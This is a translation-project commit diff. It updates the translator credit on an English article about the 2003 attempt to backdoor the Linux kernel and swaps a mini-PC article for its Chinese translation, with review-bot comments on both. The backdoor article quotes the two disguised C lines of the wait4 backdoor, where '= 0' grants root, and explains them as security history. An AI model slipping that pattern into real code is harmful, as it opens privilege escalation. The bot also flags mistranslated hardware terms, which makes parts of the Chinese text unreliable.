Merge pull request #116 from tinyeyeser/master

Translated by Mr小眼儿. Starting translation of The Linux Backdoor Attempt of 2003.md
Xingyu.Wang 2013-10-10 22:04:38 -07:00
commit 3aedabf6c6
3 changed files with 79 additions and 77 deletions


@ -1,46 +1,46 @@
The Linux Backdoor Attempt of 2003
==================================
Josh [wrote][1] recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.)
Today I want to write about another [incident][2], in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we dont know who it was that made the attempt—and we probably never will.
Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.
But some people didnt like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.
But on Nov. 5, 2003, Larry McVoy [noticed][3] that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.
What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]
A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.
Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … its a classic backdoor.
This is a very clever piece of work. It looks like innocuous error checking, but its really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.
But the attempt didnt work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.
Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, well never know.
---
via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
The Linux Backdoor Attempt of 2003
==================================
Josh [wrote][1] recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.)
Today I want to write about another [incident][2], in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we dont know who it was that made the attempt—and we probably never will.
Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.
But some people didnt like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.
But on Nov. 5, 2003, Larry McVoy [noticed][3] that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.
What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]
A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.
Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … its a classic backdoor.
This is a very clever piece of work. It looks like innocuous error checking, but its really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.
But the attempt didnt work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.
Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, well never know.
---
via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
本文由 [LCTT][] 原创翻译,[Linux中国][] 荣誉推出
译者:[译者ID][] 校对:[校对者ID][]
译者:[Mr小眼儿][] 校对:[校对者ID][]
[LCTT]:https://github.com/LCTT/TranslateProject
[Linux中国]:http://linux.cn/portal.php
[译者ID]:http://linux.cn/space/译者ID
[校对者ID]:http://linux.cn/space/校对者ID
[1]:https://freedom-to-tinker.com/blog/kroll/software-transparency-debian-openssl-bug/
[2]:https://lwn.net/Articles/57135/
[3]:https://lwn.net/Articles/57137/
[Mr小眼儿]:http://linux.cn/space/14801
[校对者ID]:http://linux.cn/space/校对者ID
[1]:https://freedom-to-tinker.com/blog/kroll/software-transparency-debian-openssl-bug/
[2]:https://lwn.net/Articles/57135/
[3]:https://lwn.net/Articles/57137/
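Review bot: The hunk header replaces all 46 lines of this file, yet the article body reads the same in the removed and the added copy; the only visible differences are the translator line (`译者:[译者ID][]` becoming `译者:[Mr小眼儿][]`) and its link definition (`[Mr小眼儿]:http://linux.cn/space/14801`). A whole-file rewrite with unchanged text may come from a line-ending or encoding change on save, and it buries a two-line claim in a diff nobody can review line by line. Please re-save with the original line endings so only the translator lines show up. Separately, the two C lines beginning `if ((options == (__WCLONE|__WALL)) && (current->uid = 0))` are not set off as a code block in either copy; the article hinges on `= 0` versus `== 0`, so indent or fence them when the translation lands to keep the underscores and operators literal.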


@ -1,36 +0,0 @@
The Utilite Linux Mini PC
================================================================================
Hello guys!
Sometimes we need to test or use another Linux distribution than the one we use to complete our daily tasks and setting up a virtual machine is not always the best solution. Have you heard about the **Utilite** Linux Mini PC?
![](http://180016988.r.cdn77.net/wp-content/uploads/2013/10/utilite-computer-3.jpg)
utilite-computer-3The Utilite is a very good choice for users looking for a Linux Mini PC at an affordable price. This device is launched by Compulab, which is the manufacturer of the MintBox. Mintbox is a little Pc box which runs Linux Mint operating system. Utilite ARM-based Linux computer costs only **$99**, a fair price if we take in consideration what this device has to offer.
The **[Utilite][1]** linux device has **2 GB of RAM** and **4 GB of internal storage**, which can be extended using a micro-SD card. This mini computer supports both Ubuntu Linux and Google Android. If you like, you can also upgrade the device the Utilite Standard which comes with with a **dual core processor** and **2 GB of RAM** along with **8 GB of internal memory** and micro-SD card support. This device is the first ARM-based model from the company to feature Freescales i.MX6 processor family and in my opinion is the best way to run Ubuntu and other GNU/Linux operating systems without buying expensive hardware.
The Utilite has single core, dual core and quad core options for the processor and an also support HDMI + DVI, 2x GbE, Wi Fi and Bluetooth. There is also the Utilite Pro which comes with a quad core processor and 2 GB of RAM along with 32 GB of internal memory. Utilite Pro has support for:
- micro-SD card
- HDMI + DVI
- 2x GbE
- WiFi
- Bluetooth
This mini Pc also features 2 Gigabit Ethernet ports , PDIF and stereo audio jacks as well as wo RS232 serial ports. A very good thing about Utilite is the the low power consumption, 3 to 8 watts of power.
--------------------------------------------------------------------------------
via: http://www.unixmen.com/utilite-linux-mini-pc/
本文由 [LCTT][] 原创翻译,[Linux中国][] 荣誉推出
译者:[Mr小眼儿][] 校对:[校对者ID][]
[LCTT]:https://github.com/LCTT/TranslateProject
[Linux中国]:http://linux.cn/portal.php
[Mr小眼儿]:http://linux.cn/space/14801
[校对者ID]:http://linux.cn/space/校对者ID
[1]:http://utilite-computer.com/web/home


@ -0,0 +1,38 @@
屌丝专用Linux迷你电脑 —— Utilite
================================================================================
同学们好~
除了完成日常工作有时需要测试或使用某一个Linux发行版的时候我们通常使用虚拟机但这并不是最好的解决方案你们是否听过Linux迷你电脑**Utilite**呢?
![](http://180016988.r.cdn77.net/wp-content/uploads/2013/10/utilite-computer-3.jpg)
对于正在寻找一款Linux迷你电脑同时却囊中羞涩的同学来说Utilite是一个非常棒的选择。这款设备由Compulab研发Compulab同时还是MintBox的制造商。Mintbox就是一款运行Linux Mint操作系统的小型电脑盒子。基于ARM的Utilite售价仅为**99美刀**,性价比出色!
**[Utilite][1]**标准版配置为**2G内存**、**4G存储容量**支持micro-SD扩展卡。支持搭载Ubuntu或Android系统。如果你愿意还可以购买升级版**双核处理器**、**2G内存**、**8G存储**以及micro-SD扩展卡支持。这款设备是该公司第一款基于ARM模型的产品采用Freescale的i.MX6系列处理器。在我看来如果买不起昂贵的硬件这是运行Ubuntu和其他GNU/Linux操作系统的最佳方法。
Utilite有单核、双核、四核多个处理器方案支持HDMI+DVI双接口2倍Gbe千兆以太网支持WiFi和蓝牙。除了标准版和升级版Utilite还提供了专业版配备四核处理器、2G内存、32G存储下面是专业版的配置
- micro-SD card
- HDMI + DVI
- 2x GbE
- WiFi
- Bluetooth
如配置中所示这款迷你电脑还支持2倍千兆以太网PDIF音频输出、立体声音频插孔和RS232系列端口。Utilite的另一个巨大优势是耗电量非常低只有3-8瓦。
各位屌丝买不起土豪金要不来一个Utilite试试~?玩好了还可以推荐给你的女神哦~
--------------------------------------------------------------------------------
via: http://www.unixmen.com/utilite-linux-mini-pc/
本文由 [LCTT][] 原创翻译,[Linux中国][] 荣誉推出
译者:[Mr小眼儿][] 校对:[校对者ID][]
[LCTT]:https://github.com/LCTT/TranslateProject
[Linux中国]:http://linux.cn/portal.php
[Mr小眼儿]:http://linux.cn/space/14801
[校对者ID]:http://linux.cn/space/校对者ID
[1]:http://utilite-computer.com/web/home
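Review bot: Several hardware terms in the added translation do not match the source text removed in this same commit. `2x GbE` is rendered as `2倍Gbe千兆以太网` and `2倍千兆以太网` ("2 times", where the source says "2 Gigabit Ethernet ports"), `RS232 serial ports` becomes `RS232系列端口` (系列 means "series"; a serial port is 串行端口), and the base model is labelled `标准版` while the source reserves "Utilite Standard" for the dual-core upgrade that the translation calls `升级版`. The title prefix `屌丝专用` and the closing line beginning `各位屌丝买不起土豪金` have no counterpart in the source; drop them or mark them clearly as translator's notes.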